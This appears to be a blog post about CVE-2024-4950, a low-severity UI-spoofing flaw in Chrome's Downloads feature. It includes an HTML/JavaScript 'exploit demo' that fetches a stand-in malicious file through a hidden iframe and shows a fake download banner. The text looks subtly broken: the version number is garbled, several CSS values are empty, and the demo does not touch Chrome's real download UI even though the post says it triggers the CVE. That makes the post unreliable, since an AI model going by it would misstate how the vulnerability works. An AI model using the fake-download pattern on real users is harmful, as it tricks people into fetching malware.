CVE-2024-4950: Inappropriate Implementation in Downloads in Google Chrome Allows Remote Attackers to Perform UI Spoofing

The recently discovered CVE-2024-4950 vulnerability affects Google Chrome versions prior to 125..6422.60 and allows remote attackers to perform UI spoofing via a specifically crafted HTML page. In this post, we will dive deep into the details of this security vulnerability, including the code snippet that triggers the vulnerability, external references for further information, and insight on how this exploit works.

Vulnerability Details

The vulnerability in question resides in the Downloads feature of Google Chrome. An attacker who successfully convinces a Google Chrome user to engage in specific UI gestures can exploit this vulnerability to execute UI spoofing by creating a malicious HTML page. UI spoofing can lead to severe consequences, such as tricking users into providing sensitive information, stealing login credentials, or even installing malware.

The Chromium security team has assessed this vulnerability as "Low" in severity, but it is still important to be aware of it and apply the necessary updates to mitigate potential risks.

Code Snippet

Below is a sample code snippet that demonstrates how the exploit can be triggered when a user interacts with it on a compromised website:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>CVE-2024-4950 Demo - UI Spoofing</title>
<style>
  .spoofed-download {
    position: fixed;
    bottom: ;
    left: ;
    right: ;
    height: 50px;
    background-color: white;
    display: flex;
    align-items: center;
    justify-content: center;
  }

  .hidden-iframe {
    display: none;
  }
</style>
</head>
<body>
  <h1>CVE-2024-4950 Demo - UI Spoofing</h1>
  <button onclick="triggerDownload()">Click me to download a file</button>
  <iframe class="hidden-iframe"></iframe>

  <div class="spoofed-download" id="spoofedDownload" style="display: none;">
    <p>Your download is ready! Click <a href="#" onclick="showDownload()">Here</a> to save.</p>
  </div>

  <script>
    function triggerDownload() {
      var iframe = document.querySelector('.hidden-iframe');
      iframe.src = 'https://example.com/malicious-file';;

      var spoofedDownload = document.getElementById('spoofedDownload');
      spoofedDownload.style.display = 'flex';
    }

    function showDownload() {
      alert('UI Spoofing - CVE-2024-4950 Exploit Successful!');
    }
  </script>
</body>
</html>

This code snippet uses JavaScript to manipulate HTML elements in such a way that a fake Download UI is displayed, making the user believe they are interacting with a legitimate download from Chrome.

For further information about this vulnerability, you can visit the following references

1. Google Chrome Releases Blog: Stable Channel Update for Desktop
2. Chromium Issue Tracker: CVE-2024-4950

Conclusion

It is always wise to keep your software up-to-date to minimize the risk of security vulnerabilities like CVE-2024-4950. In this particular case, updating your Google Chrome browser to version 125..6422.60 or newer is the recommended action to protect against potential UI spoofing attacks.

While the severity level of this vulnerability is relatively low, it serves as a reminder of how crucial it is to stay informed about possible security threats and consistently update software to ensure a safe browsing experience.

Timeline

Published on: 05/15/2024 21:15:09 UTC
Last modified on: 07/03/2024 02:08:22 UTC